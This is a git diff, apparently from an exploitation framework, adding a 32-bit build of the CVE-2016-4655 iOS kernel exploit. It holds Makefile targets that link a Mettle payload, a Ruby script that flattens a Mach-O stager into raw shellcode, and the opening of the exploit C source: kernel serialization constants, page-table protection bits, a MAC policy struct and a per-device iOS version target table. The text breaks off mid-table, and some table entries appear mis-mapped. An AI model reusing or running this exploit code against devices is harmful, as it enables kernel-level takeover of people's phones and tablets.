diff --git a/external/source/exploits/CVE-2016-4655/Makefile b/external/source/exploits/CVE-2016-4655/Makefile index e8c774c1fe..34af0cca88 100644 --- a/external/source/exploits/CVE-2016-4655/Makefile +++ b/external/source/exploits/CVE-2016-4655/Makefile @@ -1,11 +1,12 @@ #CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0 +CFLAGS_32=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0 GCC_BIN_OSX=`xcrun --sdk macosx -f gcc` GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc` GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS) -GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS) +GCC_BASE_IOS=$(GCC_BIN_IOS) GCC_OSX=$(GCC_BASE_OSX) -arch x86_64 SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path` -GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \ +GCC_IOS=$(GCC_BASE_IOS) $(CFLAGS) -arch arm64 -isysroot $(SDK_IOS) \ -Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \ -I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \ -I/Users/User/rsync/mettle/mettle/src \ @@ -13,7 +14,10 @@ GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \ -lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \ -framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit -all: clean main_ios +GCC_IOS_32=$(GCC_BASE_IOS) $(CFLAGS_32) -arch armv7 -isysroot $(SDK_IOS) \ + -Iheaders + +all: clean main_ios main_ios32 flatten: flatten-macho.m $(GCC_OSX) -o $@ $^ @@ -21,12 +25,21 @@ flatten: flatten-macho.m main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m $(GCC_IOS) -o $@ $^ +main_ios32: main32.c + $(GCC_IOS_32) -o $@ $^ + +main_ios32.bin: main_ios32 + ruby create_bin.rb main_ios32 + main_vm: flatten main_ios ./flatten main_ios main_vm install: main_vm cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit -clean: - rm -f *.o main_ios main_vm flatten +install32: main_ios32.bin + cp main_ios32.bin ../../../../data/exploits/CVE-2016-4655/exploit32 + +clean: + rm -f *.o main_ios main_ios32 main_vm flatten diff --git a/external/source/exploits/CVE-2016-4655/create_bin.rb b/external/source/exploits/CVE-2016-4655/create_bin.rb new file mode 100644 index 0000000000..e759639598 --- /dev/null +++ b/external/source/exploits/CVE-2016-4655/create_bin.rb @@ -0,0 +1,52 @@ +#!/usr/bin/env ruby +# -*- coding: binary -*- + +require 'macho' + +stager_file = ARGV[0] +data = File.binread(stager_file) +macho = MachO::MachOFile.new_from_bin(data) +main_func = macho[:LC_MAIN].first +entry_offset = main_func.entryoff + +start = -1 +min = -1 +max = 0 +for segment in macho.segments + next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO] + puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}" + if min == -1 or min > segment.vmaddr + min = segment.vmaddr + end + if max < segment.vmaddr + segment.vmsize + max = segment.vmaddr + segment.vmsize + end +end + +puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}" +output_data = "\x00" * (max - min) + +for segment in macho.segments + #next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO] + puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}" + for section in segment.sections + puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}" + flat_addr = section.addr - min + section_data = data[section.offset, section.size] + #file_section = section.offset + #puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}" + #puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}" + if section_data + puts "flat_addr: #{flat_addr.to_s(16)} (#{section_data.size.to_s(16)})" + if start == -1 or start > flat_addr + start = flat_addr + end + output_data[flat_addr, section_data.size] = section_data + end + end +end + +puts "start: #{start.to_s(16)}" +output_data = output_data[start..-1] +File.binwrite(stager_file + ".bin", output_data) + diff --git a/external/source/exploits/CVE-2016-4655/exploit32.c b/external/source/exploits/CVE-2016-4655/exploit32.c new file mode 100644 index 0000000000..0c19c7ab03 --- /dev/null +++ b/external/source/exploits/CVE-2016-4655/exploit32.c @@ -0,0 +1,3984 @@ +// +// exploit.c +// Trident +// +// Created by Benjamin Randazzo on 06/11/2016. +// Copyright © 2016 Benjamin Randazzo. All rights reserved. +// + +#include +#include +#include +#include +#include + +#include + +#include +#include +#include + +#include + +#include + +#include +#include + +#include + +enum +{ + kOSSerializeDictionary = 0x01000000U, + kOSSerializeArray = 0x02000000U, + kOSSerializeSet = 0x03000000U, + kOSSerializeNumber = 0x04000000U, + kOSSerializeSymbol = 0x08000000U, + kOSSerializeString = 0x09000000U, + kOSSerializeData = 0x0a000000U, + kOSSerializeBoolean = 0x0b000000U, + kOSSerializeObject = 0x0c000000U, + kOSSerializeTypeMask = 0x7F000000U, + kOSSerializeDataMask = 0x00FFFFFFU, + kOSSerializeEndCollecton = 0x80000000U, +}; + +#define kOSSerializeBinarySignature "\323\0\0" + +#define WRITE_IN(buf, data) do { *(uint32_t *)(buf+bufpos) = (data); bufpos+=4; } while(0) + +typedef void* (*dlopen_ptr)(const char *filename, int flags); +typedef void* (*dlsym_ptr)(void *handle, const char *symbol); +static dlopen_ptr dlopen_func = 0; +static dlsym_ptr dlsym_func = 0; + +#ifdef DEBUG +#define debug_print(fmt, ...) \ + do { asl_log_func(0, 0, ASL_LEVEL_ERR, fmt, __VA_ARGS__); } while (0) +#else +#define debug_print(fmt, ...) +#endif + +#define DLSYM_FUNC(func, library, return_type, args...) \ + typedef return_type (*func##_ptr)(args); \ + func##_ptr func##_func = dlsym_func(library, #func); \ + debug_print("function %s = %p!\n", #func, func##_func); + +#define TTB_SIZE 4096 + +#define L1_SECT_S_BIT (1 << 16) +#define L1_SECT_PROTO (1 << 1) /* 0b10 */ +#define L1_SECT_AP_URW (1 << 10) | (1 << 11) +#define L1_SECT_APX (1 << 15) +#define L1_SECT_DEFPROT (L1_SECT_AP_URW | L1_SECT_APX) +#define L1_SECT_SORDER (0) /* 0b00, not cacheable, strongly ordered. */ +#define L1_SECT_DEFCACHE (L1_SECT_SORDER) +#define L1_PROTO_TTE(entry) (entry | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE) + +#define L1_PAGE_PROTO (1 << 0) +#define L1_COARSE_PT (0xFFFFFC00) + +#define PT_SIZE 256 + +#define L2_PAGE_APX (1 << 9) + +static char *lockfile; +static int fd; + +static int fildes[2]; +static uint32_t cpipe; +static uint32_t pipebuf; + +static clock_serv_t clk_battery; +static clock_serv_t clk_realtime; + +struct mac_policy_ops{ + uint32_t mpo_audit_check_postselect; + uint32_t mpo_audit_check_preselect; + uint32_t mpo_bpfdesc_label_associate; + uint32_t mpo_bpfdesc_label_destroy; + uint32_t mpo_bpfdesc_label_init; + uint32_t mpo_bpfdesc_check_receive; + uint32_t mpo_cred_check_label_update_execve; + uint32_t mpo_cred_check_label_update; + uint32_t mpo_cred_check_visible; + uint32_t mpo_cred_label_associate_fork; + uint32_t mpo_cred_label_associate_kernel; + uint32_t mpo_cred_label_associate; + uint32_t mpo_cred_label_associate_user; + uint32_t mpo_cred_label_destroy; + uint32_t mpo_cred_label_externalize_audit; + uint32_t mpo_cred_label_externalize; + uint32_t mpo_cred_label_init; + uint32_t mpo_cred_label_internalize; + uint32_t mpo_cred_label_update_execve; + uint32_t mpo_cred_label_update; + uint32_t mpo_devfs_label_associate_device; + uint32_t mpo_devfs_label_associate_directory; + uint32_t mpo_devfs_label_copy; + uint32_t mpo_devfs_label_destroy; + uint32_t mpo_devfs_label_init; + uint32_t mpo_devfs_label_update; + uint32_t mpo_file_check_change_offset; + uint32_t mpo_file_check_create; + uint32_t mpo_file_check_dup; + uint32_t mpo_file_check_fcntl; + uint32_t mpo_file_check_get_offset; + uint32_t mpo_file_check_get; + uint32_t mpo_file_check_inherit; + uint32_t mpo_file_check_ioctl; + uint32_t mpo_file_check_lock; + uint32_t mpo_file_check_mmap_downgrade; + uint32_t mpo_file_check_mmap; + uint32_t mpo_file_check_receive; + uint32_t mpo_file_check_set; + uint32_t mpo_file_label_init; + uint32_t mpo_file_label_destroy; + uint32_t mpo_file_label_associate; + uint32_t mpo_ifnet_check_label_update; + uint32_t mpo_ifnet_check_transmit; + uint32_t mpo_ifnet_label_associate; + uint32_t mpo_ifnet_label_copy; + uint32_t mpo_ifnet_label_destroy; + uint32_t mpo_ifnet_label_externalize; + uint32_t mpo_ifnet_label_init; + uint32_t mpo_ifnet_label_internalize; + uint32_t mpo_ifnet_label_update; + uint32_t mpo_ifnet_label_recycle; + uint32_t mpo_inpcb_check_deliver; + uint32_t mpo_inpcb_label_associate; + uint32_t mpo_inpcb_label_destroy; + uint32_t mpo_inpcb_label_init; + uint32_t mpo_inpcb_label_recycle; + uint32_t mpo_inpcb_label_update; + uint32_t mpo_iokit_check_device; + uint32_t mpo_ipq_label_associate; + uint32_t mpo_ipq_label_compare; + uint32_t mpo_ipq_label_destroy; + uint32_t mpo_ipq_label_init; + uint32_t mpo_ipq_label_update; + uint32_t mpo_file_check_library_validation; + uint32_t mpo_vnode_notify_setacl; + uint32_t mpo_vnode_notify_setattrlist; + uint32_t mpo_vnode_notify_setextattr; + uint32_t mpo_vnode_notify_setflags; + uint32_t mpo_vnode_notify_setmode; + uint32_t mpo_vnode_notify_setowner; + uint32_t mpo_vnode_notify_setutimes; + uint32_t mpo_vnode_notify_truncate; + uint32_t mpo_mbuf_label_associate_bpfdesc; + uint32_t mpo_mbuf_label_associate_ifnet; + uint32_t mpo_mbuf_label_associate_inpcb; + uint32_t mpo_mbuf_label_associate_ipq; + uint32_t mpo_mbuf_label_associate_linklayer; + uint32_t mpo_mbuf_label_associate_multicast_encap; + uint32_t mpo_mbuf_label_associate_netlayer; + uint32_t mpo_mbuf_label_associate_socket; + uint32_t mpo_mbuf_label_copy; + uint32_t mpo_mbuf_label_destroy; + uint32_t mpo_mbuf_label_init; + uint32_t mpo_mount_check_fsctl; + uint32_t mpo_mount_check_getattr; + uint32_t mpo_mount_check_label_update; + uint32_t mpo_mount_check_mount; + uint32_t mpo_mount_check_remount; + uint32_t mpo_mount_check_setattr; + uint32_t mpo_mount_check_stat; + uint32_t mpo_mount_check_umount; + uint32_t mpo_mount_label_associate; + uint32_t mpo_mount_label_destroy; + uint32_t mpo_mount_label_externalize; + uint32_t mpo_mount_label_init; + uint32_t mpo_mount_label_internalize; + uint32_t mpo_netinet_fragment; + uint32_t mpo_netinet_icmp_reply; + uint32_t mpo_netinet_tcp_reply; + uint32_t mpo_pipe_check_ioctl; + uint32_t mpo_pipe_check_kqfilter; + uint32_t mpo_pipe_check_label_update; + uint32_t mpo_pipe_check_read; + uint32_t mpo_pipe_check_select; + uint32_t mpo_pipe_check_stat; + uint32_t mpo_pipe_check_write; + uint32_t mpo_pipe_label_associate; + uint32_t mpo_pipe_label_copy; + uint32_t mpo_pipe_label_destroy; + uint32_t mpo_pipe_label_externalize; + uint32_t mpo_pipe_label_init; + uint32_t mpo_pipe_label_internalize; + uint32_t mpo_pipe_label_update; + uint32_t mpo_policy_destroy; + uint32_t mpo_policy_init; + uint32_t mpo_policy_initbsd; + uint32_t mpo_policy_syscall; + uint32_t mpo_system_check_sysctlbyname; + uint32_t mpo_proc_check_inherit_ipc_ports; + uint32_t mpo_vnode_check_rename; + uint32_t mpo_kext_check_query; + uint32_t mpo_iokit_check_nvram_get; + uint32_t mpo_iokit_check_nvram_set; + uint32_t mpo_iokit_check_nvram_delete; + uint32_t mpo_proc_check_expose_task; + uint32_t mpo_proc_check_set_host_special_port; + uint32_t mpo_proc_check_set_host_exception_port; + uint32_t mpo_exc_action_check_exception_send; + uint32_t mpo_exc_action_label_associate; + uint32_t mpo_exc_action_label_populate; + uint32_t mpo_exc_action_label_destroy; + uint32_t mpo_exc_action_label_init; + uint32_t mpo_exc_action_label_update; + uint32_t mpo_reserved1; + uint32_t mpo_reserved2; + uint32_t mpo_reserved3; + uint32_t mpo_reserved4; + uint32_t mpo_skywalk_flow_check_connect; + uint32_t mpo_skywalk_flow_check_listen; + uint32_t mpo_posixsem_check_create; + uint32_t mpo_posixsem_check_open; + uint32_t mpo_posixsem_check_post; + uint32_t mpo_posixsem_check_unlink; + uint32_t mpo_posixsem_check_wait; + uint32_t mpo_posixsem_label_associate; + uint32_t mpo_posixsem_label_destroy; + uint32_t mpo_posixsem_label_init; + uint32_t mpo_posixshm_check_create; + uint32_t mpo_posixshm_check_mmap; + uint32_t mpo_posixshm_check_open; + uint32_t mpo_posixshm_check_stat; + uint32_t mpo_posixshm_check_truncate; + uint32_t mpo_posixshm_check_unlink; + uint32_t mpo_posixshm_label_associate; + uint32_t mpo_posixshm_label_destroy; + uint32_t mpo_posixshm_label_init; + uint32_t mpo_proc_check_debug; + uint32_t mpo_proc_check_fork; + uint32_t mpo_proc_check_get_task_name; + uint32_t mpo_proc_check_get_task; + uint32_t mpo_proc_check_getaudit; + uint32_t mpo_proc_check_getauid; + uint32_t mpo_proc_check_getlcid; + uint32_t mpo_proc_check_mprotect; + uint32_t mpo_proc_check_sched; + uint32_t mpo_proc_check_setaudit; + uint32_t mpo_proc_check_setauid; + uint32_t mpo_proc_check_setlcid; + uint32_t mpo_proc_check_signal; + uint32_t mpo_proc_check_wait; + uint32_t mpo_proc_label_destroy; + uint32_t mpo_proc_label_init; + uint32_t mpo_socket_check_accept; + uint32_t mpo_socket_check_accepted; + uint32_t mpo_socket_check_bind; + uint32_t mpo_socket_check_connect; + uint32_t mpo_socket_check_create; + uint32_t mpo_socket_check_deliver; + uint32_t mpo_socket_check_kqfilter; + uint32_t mpo_socket_check_label_update; + uint32_t mpo_socket_check_listen; + uint32_t mpo_socket_check_receive; + uint32_t mpo_socket_check_received; + uint32_t mpo_socket_check_select; + uint32_t mpo_socket_check_send; + uint32_t mpo_socket_check_stat; + uint32_t mpo_socket_check_setsockopt; + uint32_t mpo_socket_check_getsockopt; + uint32_t mpo_socket_label_associate_accept; + uint32_t mpo_socket_label_associate; + uint32_t mpo_socket_label_copy; + uint32_t mpo_socket_label_destroy; + uint32_t mpo_socket_label_externalize; + uint32_t mpo_socket_label_init; + uint32_t mpo_socket_label_internalize; + uint32_t mpo_socket_label_update; + uint32_t mpo_socketpeer_label_associate_mbuf; + uint32_t mpo_socketpeer_label_associate_socket; + uint32_t mpo_socketpeer_label_destroy; + uint32_t mpo_socketpeer_label_externalize; + uint32_t mpo_socketpeer_label_init; + uint32_t mpo_system_check_acct; + uint32_t mpo_system_check_audit; + uint32_t mpo_system_check_auditctl; + uint32_t mpo_system_check_auditon; + uint32_t mpo_system_check_host_priv; + uint32_t mpo_system_check_nfsd; + uint32_t mpo_system_check_reboot; + uint32_t mpo_system_check_settime; + uint32_t mpo_system_check_swapoff; + uint32_t mpo_system_check_swapon; + uint32_t mpo_socket_check_ioctl; + uint32_t mpo_sysvmsg_label_associate; + uint32_t mpo_sysvmsg_label_destroy; + uint32_t mpo_sysvmsg_label_init; + uint32_t mpo_sysvmsg_label_recycle; + uint32_t mpo_sysvmsq_check_enqueue; + uint32_t mpo_sysvmsq_check_msgrcv; + uint32_t mpo_sysvmsq_check_msgrmid; + uint32_t mpo_sysvmsq_check_msqctl; + uint32_t mpo_sysvmsq_check_msqget; + uint32_t mpo_sysvmsq_check_msqrcv; + uint32_t mpo_sysvmsq_check_msqsnd; + uint32_t mpo_sysvmsq_label_associate; + uint32_t mpo_sysvmsq_label_destroy; + uint32_t mpo_sysvmsq_label_init; + uint32_t mpo_sysvmsq_label_recycle; + uint32_t mpo_sysvsem_check_semctl; + uint32_t mpo_sysvsem_check_semget; + uint32_t mpo_sysvsem_check_semop; + uint32_t mpo_sysvsem_label_associate; + uint32_t mpo_sysvsem_label_destroy; + uint32_t mpo_sysvsem_label_init; + uint32_t mpo_sysvsem_label_recycle; + uint32_t mpo_sysvshm_check_shmat; + uint32_t mpo_sysvshm_check_shmctl; + uint32_t mpo_sysvshm_check_shmdt; + uint32_t mpo_sysvshm_check_shmget; + uint32_t mpo_sysvshm_label_associate; + uint32_t mpo_sysvshm_label_destroy; + uint32_t mpo_sysvshm_label_init; + uint32_t mpo_sysvshm_label_recycle; + uint32_t mpo_proc_notify_exit; + uint32_t mpo_mount_check_snapshot_revert; + uint32_t mpo_vnode_check_getattr; + uint32_t mpo_mount_check_snapshot_create; + uint32_t mpo_mount_check_snapshot_delete; + uint32_t mpo_vnode_check_clone; + uint32_t mpo_proc_check_get_cs_info; + uint32_t mpo_proc_check_set_cs_info; + uint32_t mpo_iokit_check_hid_control; + uint32_t mpo_vnode_check_access; + uint32_t mpo_vnode_check_chdir; + uint32_t mpo_vnode_check_chroot; + uint32_t mpo_vnode_check_create; + uint32_t mpo_vnode_check_deleteextattr; + uint32_t mpo_vnode_check_exchangedata; + uint32_t mpo_vnode_check_exec; + uint32_t mpo_vnode_check_getattrlist; + uint32_t mpo_vnode_check_getextattr; + uint32_t mpo_vnode_check_ioctl; + uint32_t mpo_vnode_check_kqfilter; + uint32_t mpo_vnode_check_label_update; + uint32_t mpo_vnode_check_link; + uint32_t mpo_vnode_check_listextattr; + uint32_t mpo_vnode_check_lookup; + uint32_t mpo_vnode_check_open; + uint32_t mpo_vnode_check_read; + uint32_t mpo_vnode_check_readdir; + uint32_t mpo_vnode_check_readlink; + uint32_t mpo_vnode_check_rename_from; + uint32_t mpo_vnode_check_rename_to; + uint32_t mpo_vnode_check_revoke; + uint32_t mpo_vnode_check_select; + uint32_t mpo_vnode_check_setattrlist; + uint32_t mpo_vnode_check_setextattr; + uint32_t mpo_vnode_check_setflags; + uint32_t mpo_vnode_check_setmode; + uint32_t mpo_vnode_check_setowner; + uint32_t mpo_vnode_check_setutimes; + uint32_t mpo_vnode_check_stat; + uint32_t mpo_vnode_check_truncate; + uint32_t mpo_vnode_check_unlink; + uint32_t mpo_vnode_check_write; + uint32_t mpo_vnode_label_associate_devfs; + uint32_t mpo_vnode_label_associate_extattr; + uint32_t mpo_vnode_label_associate_file; + uint32_t mpo_vnode_label_associate_pipe; + uint32_t mpo_vnode_label_associate_posixsem; + uint32_t mpo_vnode_label_associate_posixshm; + uint32_t mpo_vnode_label_associate_singlelabel; + uint32_t mpo_vnode_label_associate_socket; + uint32_t mpo_vnode_label_copy; + uint32_t mpo_vnode_label_destroy; + uint32_t mpo_vnode_label_externalize_audit; + uint32_t mpo_vnode_label_externalize; + uint32_t mpo_vnode_label_init; + uint32_t mpo_vnode_label_internalize; + uint32_t mpo_vnode_label_recycle; + uint32_t mpo_vnode_label_store; + uint32_t mpo_vnode_label_update_extattr; + uint32_t mpo_vnode_label_update; + uint32_t mpo_vnode_notify_create; + uint32_t mpo_vnode_check_signature; + uint32_t mpo_vnode_check_uipc_bind; + uint32_t mpo_vnode_check_uipc_connect; + uint32_t mpo_proc_check_run_cs_invalid; + uint32_t mpo_proc_check_suspend_resume; + uint32_t mpo_thread_userret; + uint32_t mpo_iokit_check_set_properties; + uint32_t mpo_system_check_chud; + uint32_t mpo_vnode_check_searchfs; + uint32_t mpo_priv_check; + uint32_t mpo_priv_grant; + uint32_t mpo_proc_check_map_anon; + uint32_t mpo_vnode_check_fsgetpath; + uint32_t mpo_iokit_check_open; + uint32_t mpo_proc_check_ledger; + uint32_t mpo_vnode_notify_rename; + uint32_t mpo_vnode_check_setacl; + uint32_t mpo_vnode_notify_deleteextattr; + uint32_t mpo_system_check_kas_info; + uint32_t mpo_vnode_check_lookup_preflight; + uint32_t mpo_vnode_notify_open; + uint32_t mpo_system_check_info; + uint32_t mpo_pty_notify_grant; + uint32_t mpo_pty_notify_close; + uint32_t mpo_vnode_find_sigs; + uint32_t mpo_kext_check_load; + uint32_t mpo_kext_check_unload; + uint32_t mpo_proc_check_proc_info; + uint32_t mpo_vnode_notify_link; + uint32_t mpo_iokit_check_filter_properties; + uint32_t mpo_iokit_check_get_property; +}; + +#define determineTarget(modelIdentifier, swVers, target) if (!string_compare(device_model, modelIdentifier)) { if (!string_compare(system_version, swVers)) { return target; }} + +typedef enum { + NotSupported, + iPhone41_iOS902, + iPhone41_iOS910, + iPhone41_iOS920, + iPhone41_iOS921, + iPhone41_iOS930, + iPhone41_iOS931, + iPhone41_iOS932, + iPhone41_iOS933, + iPhone41_iOS934, + iPhone51_iOS910, + iPhone51_iOS920, + iPhone51_iOS921, + iPhone51_iOS930, + iPhone51_iOS931, + iPhone51_iOS932, + iPhone51_iOS933, + iPhone51_iOS934, + iPhone52_iOS902, + iPhone52_iOS910, + iPhone52_iOS920, + iPhone52_iOS921, + iPhone52_iOS930, + iPhone52_iOS931, + iPhone52_iOS932, + iPhone52_iOS933, + iPhone52_iOS934, + iPhone53_iOS910, + iPhone53_iOS920, + iPhone53_iOS921, + iPhone53_iOS930, + iPhone53_iOS931, + iPhone53_iOS932, + iPhone53_iOS933, + iPhone53_iOS934, + iPhone54_iOS910, + iPhone54_iOS920, + iPhone54_iOS921, + iPhone54_iOS930, + iPhone54_iOS931, + iPhone54_iOS932, + iPhone54_iOS933, + iPhone54_iOS934, + iPad21_iOS910, + iPad21_iOS920, + iPad21_iOS921, + iPad21_iOS930, + iPad21_iOS931, + iPad21_iOS932, + iPad21_iOS933, + iPad21_iOS934, + iPad22_iOS910, + iPad22_iOS920, + iPad22_iOS921, + iPad22_iOS930, + iPad22_iOS931, + iPad22_iOS932, + iPad22_iOS933, + iPad22_iOS934, + iPad23_iOS910, + iPad23_iOS920, + iPad23_iOS921, + iPad23_iOS930, + iPad23_iOS931, + iPad23_iOS932, + iPad23_iOS933, + iPad23_iOS934, + iPad24_iOS910, + iPad24_iOS920, + iPad24_iOS921, + iPad24_iOS930, + iPad24_iOS931, + iPad24_iOS932, + iPad24_iOS933, + iPad24_iOS934, + iPad25_iOS902, + iPad25_iOS910, + iPad25_iOS920, + iPad25_iOS921, + iPad25_iOS930, + iPad25_iOS931, + iPad25_iOS932, + iPad25_iOS933, + iPad25_iOS934, + iPad26_iOS910, + iPad26_iOS920, + iPad26_iOS921, + iPad26_iOS930, + iPad26_iOS931, + iPad26_iOS932, + iPad26_iOS933, + iPad26_iOS934, + iPad27_iOS910, + iPad27_iOS920, + iPad27_iOS921, + iPad27_iOS930, + iPad27_iOS931, + iPad27_iOS932, + iPad27_iOS933, + iPad27_iOS934, + iPad31_iOS910, + iPad31_iOS920, + iPad31_iOS921, + iPad31_iOS930, + iPad31_iOS931, + iPad31_iOS932, + iPad31_iOS933, + iPad31_iOS934, + iPad32_iOS910, + iPad32_iOS920, + iPad32_iOS921, + iPad32_iOS930, + iPad32_iOS931, + iPad32_iOS932, + iPad32_iOS933, + iPad32_iOS934, + iPad33_iOS902, + iPad33_iOS910, + iPad33_iOS920, + iPad33_iOS921, + iPad33_iOS930, + iPad33_iOS931, + iPad33_iOS932, + iPad33_iOS933, + iPad33_iOS934, + iPad34_iOS910, + iPad34_iOS920, + iPad34_iOS921, + iPad34_iOS930, + iPad34_iOS931, + iPad34_iOS932, + iPad34_iOS933, + iPad34_iOS934, + iPad35_iOS910, + iPad35_iOS920, + iPad35_iOS921, + iPad35_iOS930, + iPad35_iOS931, + iPad35_iOS932, + iPad35_iOS933, + iPad35_iOS934, + iPad36_iOS910, + iPad36_iOS920, + iPad36_iOS921, + iPad36_iOS930, + iPad36_iOS931, + iPad36_iOS932, + iPad36_iOS933, + iPad36_iOS934, + iPod51_iOS910, + iPod51_iOS920, + iPod51_iOS921, + iPod51_iOS930, + iPod51_iOS931, + iPod51_iOS932, + iPod51_iOS933, + iPod51_iOS934 +} t_target_environment; + +static t_target_environment target_environment; + +t_target_environment info_to_target_environment(const char *device_model, const char *system_version) { + determineTarget("iPhone4,1", "9.0.2", iPhone41_iOS902); + determineTarget("iPhone4,1", "9.1", iPhone41_iOS910); + determineTarget("iPhone4,1", "9.2", iPhone41_iOS920); + determineTarget("iPhone4,1", "9.2.1", iPhone41_iOS921); + determineTarget("iPhone4,1", "9.3", iPhone41_iOS930); + determineTarget("iPhone4,1", "9.3.1", iPhone41_iOS931); + determineTarget("iPhone4,1", "9.3.2", iPhone41_iOS932); + determineTarget("iPhone4,1", "9.3.3", iPhone41_iOS933); + determineTarget("iPhone4,1", "9.3.4", iPhone41_iOS934); + determineTarget("iPhone5,1", "9.1", iPhone51_iOS910); + determineTarget("iPhone5,1", "9.2", iPhone51_iOS920); + determineTarget("iPhone5,1", "9.2.1", iPhone51_iOS921); + determineTarget("iPhone5,1", "9.3", iPhone51_iOS930); + determineTarget("iPhone5,1", "9.3.1", iPhone51_iOS931); + determineTarget("iPhone5,1", "9.3.2", iPhone51_iOS932); + determineTarget("iPhone5,1", "9.3.3", iPhone51_iOS933); + determineTarget("iPhone5,1", "9.3.4", iPhone51_iOS934); + determineTarget("iPhone5,2", "9.0.2", iPhone52_iOS902); + determineTarget("iPhone5,2", "9.1", iPhone52_iOS910); + determineTarget("iPhone5,2", "9.2", iPhone52_iOS920); + determineTarget("iPhone5,2", "9.2.1", iPhone52_iOS921); + determineTarget("iPhone5,2", "9.3", iPhone52_iOS930); + determineTarget("iPhone5,2", "9.3.1", iPhone52_iOS931); + determineTarget("iPhone5,2", "9.3.2", iPhone52_iOS932); + determineTarget("iPhone5,2", "9.3.3", iPhone52_iOS933); + determineTarget("iPhone5,2", "9.3.4", iPhone52_iOS934); + determineTarget("iPhone5,3", "9.1", iPhone53_iOS910); + determineTarget("iPhone5,3", "9.2", iPhone53_iOS920); + determineTarget("iPhone5,3", "9.2.1", iPhone53_iOS921); + determineTarget("iPhone5,3", "9.3", iPhone53_iOS930); + determineTarget("iPhone5,3", "9.3.1", iPhone53_iOS931); + determineTarget("iPhone5,3", "9.3.2", iPhone53_iOS932); + determineTarget("iPhone5,3", "9.3.3", iPhone53_iOS933); + determineTarget("iPhone5,3", "9.3.4", iPhone53_iOS934); + determineTarget("iPhone5,4", "9.1", iPhone54_iOS910); + determineTarget("iPhone5,4", "9.2", iPhone54_iOS920); + determineTarget("iPhone5,4", "9.2.1", iPhone54_iOS921); + determineTarget("iPhone5,4", "9.3", iPhone54_iOS930); + determineTarget("iPhone5,4", "9.3.1", iPhone54_iOS931); + determineTarget("iPhone5,4", "9.3.2", iPhone54_iOS932); + determineTarget("iPhone5,4", "9.3.3", iPhone54_iOS933); + determineTarget("iPhone5,4", "9.3.4", iPhone54_iOS934); + determineTarget("iPad2,1", "9.1", iPad21_iOS910); + determineTarget("iPad2,1", "9.2", iPad21_iOS920); + determineTarget("iPad2,1", "9.2.1", iPad21_iOS921); + determineTarget("iPad2,1", "9.3", iPad21_iOS930); + determineTarget("iPad2,1", "9.3.1", iPad21_iOS931); + determineTarget("iPad2,1", "9.3.2", iPad21_iOS932); + determineTarget("iPad2,1", "9.3.3", iPad21_iOS933); + determineTarget("iPad2,1", "9.3.4", iPad21_iOS934); + determineTarget("iPad2,2", "9.1", iPad22_iOS910); + determineTarget("iPad2,2", "9.2", iPad22_iOS920); + determineTarget("iPad2,2", "9.2.1", iPad22_iOS921); + determineTarget("iPad2,2", "9.3", iPad22_iOS930); + determineTarget("iPad2,2", "9.3.1", iPad22_iOS931); + determineTarget("iPad2,2", "9.3.2", iPad22_iOS932); + determineTarget("iPad2,2", "9.3.3", iPad22_iOS933); + determineTarget("iPad2,2", "9.3.4", iPad22_iOS934); + determineTarget("iPad2,3", "9.1", iPad23_iOS910); + determineTarget("iPad2,3", "9.2", iPad23_iOS920); + determineTarget("iPad2,3", "9.2.1", iPad23_iOS921); + determineTarget("iPad2,3", "9.3.0", iPad23_iOS930); + determineTarget("iPad2,3", "9.3.1", iPad23_iOS931); + determineTarget("iPad2,3", "9.3.2", iPad23_iOS920); + determineTarget("iPad2,3", "9.3.3", iPad23_iOS933); + determineTarget("iPad2,3", "9.3.4", iPad23_iOS934); + determineTarget("iPad2,4", "9.1", iPad24_iOS910); + determineTarget("iPad2,4", "9.2", iPad24_iOS920); + determineTarget("iPad2,4", "9.2.1", iPad24_iOS921); + determineTarget("iPad2,4", "9.3.0", iPad24_iOS930); + determineTarget("iPad2,4", "9.3.1", iPad24_iOS931); + determineTarget("iPad2,4", "9.3.2", iPad24_iOS920); + determineTarget("iPad2,4", "9.3.3", iPad24_iOS933); + determineTarget("iPad2,4", "9.3.4", iPad24_iOS934); + determineTarget("iPad2,5", "9.0.2", iPad25_iOS902); + determineTarget("iPad2,5", "9.1", iPad25_iOS910); + determineTarget("iPad2,5", "9.2", iPad25_iOS920); + determineTarget("iPad2,5", "9.2.1", iPad25_iOS921); + determineTarget("iPad2,5", "9.3", iPad25_iOS930); + determineTarget("iPad2,5", "9.3.1", iPad25_iOS931); + determineTarget("iPad2,5", "9.3.2", iPad25_iOS932); + determineTarget("iPad2,5", "9.3.3", iPad25_iOS933); + determineTarget("iPad2,5", "9.3.4", iPad25_iOS934); + determineTarget("iPad2,6", "9.1", iPad26_iOS910); + determineTarget("iPad2,6", "9.2", iPad26_iOS920); + determineTarget("iPad2,6", "9.2.1", iPad26_iOS921); + determineTarget("iPad2,6", "9.3", iPad26_iOS930); + determineTarget("iPad2,6", "9.3.1", iPad26_iOS931); + determineTarget("iPad2,6", "9.3.2", 